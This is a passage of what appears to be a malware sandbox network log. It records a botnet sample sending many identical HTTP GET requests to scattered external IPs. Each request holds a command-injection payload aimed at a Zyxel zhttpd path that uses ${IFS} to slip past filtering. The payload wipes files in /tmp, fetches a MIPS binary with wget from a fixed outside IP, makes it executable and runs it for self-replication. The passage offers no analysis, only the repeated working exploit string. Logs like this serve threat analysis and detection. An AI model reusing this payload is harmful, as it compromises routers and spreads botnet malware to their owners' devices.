                                                  Jan 19, 2024 18:23:26.661288023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  496192.168.2.1344208189.28.19.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661330938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  497192.168.2.1351190103.152.160.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661355019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  498192.168.2.1357844101.78.245.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661416054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  499192.168.2.1334534147.48.198.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661448002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  500192.168.2.1357986116.28.152.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661489010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  501192.168.2.1338940167.152.160.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661523104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  502192.168.2.133416227.11.52.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661559105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  503192.168.2.1355150167.132.61.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661603928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  504192.168.2.1344102219.101.251.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661618948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  505192.168.2.1345646212.33.180.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661659956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  506192.168.2.1336558181.13.156.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661710024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  507192.168.2.135497846.6.232.213443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661751986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  508192.168.2.1359782107.94.57.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661806107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  509192.168.2.133882634.12.191.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661813974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  510192.168.2.135987013.193.220.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661847115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  511192.168.2.1341690206.216.128.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661932945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  512192.168.2.134619834.132.40.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661956072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  513192.168.2.135661462.201.111.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661956072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  514192.168.2.1359374126.90.200.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.661988020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  515192.168.2.1341318154.119.27.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.662029028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  516192.168.2.1346736151.162.150.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.662059069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  517192.168.2.134722051.78.30.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.662115097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  518192.168.2.1341916152.137.163.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.662133932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  519192.168.2.1339484114.199.174.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.662189960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  520192.168.2.1337300138.12.243.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.662219048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  521192.168.2.134479888.168.58.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:26.662247896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  522192.168.2.133419277.74.122.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:27.667313099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  523192.168.2.1337344211.87.140.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:27.667375088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  524192.168.2.1359434213.10.153.183443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:28.671386957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  525192.168.2.136047496.249.170.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:28.671444893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  526192.168.2.134201047.131.149.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:28.671504974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  527192.168.2.134397290.238.88.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:29.675350904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  528192.168.2.135425681.110.251.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:29.675395012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  529192.168.2.134467839.67.23.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:29.675441980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  530192.168.2.1346912221.168.164.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:29.675473928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  531192.168.2.1347240162.104.50.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:29.675518036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  532192.168.2.1343440138.55.169.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:29.675544024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  533192.168.2.133944638.224.145.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:29.675590038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  534192.168.2.134982866.206.158.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:29.675738096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  535192.168.2.1339032159.133.186.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:29.675780058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  536192.168.2.134882045.72.76.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:30.680274963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  537192.168.2.1348878136.45.220.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:30.680320978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  538192.168.2.134302262.238.79.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:30.680351019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  539192.168.2.1333310197.249.191.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:30.680387020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  540192.168.2.1355158151.247.17.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:30.680427074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  541192.168.2.133751462.178.152.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:31.686045885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  542192.168.2.135534062.211.213.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:31.686094046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  543192.168.2.136096298.73.224.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:32.691442966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  544192.168.2.1336488176.58.72.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:32.691504002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  545192.168.2.13549442.214.78.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:32.691540956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  546192.168.2.1343414200.108.98.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:33.696996927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  547192.168.2.133329220.233.2.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:33.697042942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  548192.168.2.1353896158.24.77.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:33.697125912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  549192.168.2.133676825.109.122.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:34.701164961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  550192.168.2.134068268.211.147.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:34.701174974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  551192.168.2.1352602167.185.175.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:34.701206923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  552192.168.2.1349744143.250.37.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:34.701234102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  553192.168.2.1344948140.253.125.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:34.701261044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  554192.168.2.133765044.84.187.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:34.701365948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  555192.168.2.1358528107.189.33.144443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:34.701381922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  556192.168.2.1347908173.240.38.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:34.701415062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  557192.168.2.1353870201.151.140.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:34.701498032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  558192.168.2.1332788209.161.42.21443
                                                  TimestampBytes transferredDirectionData
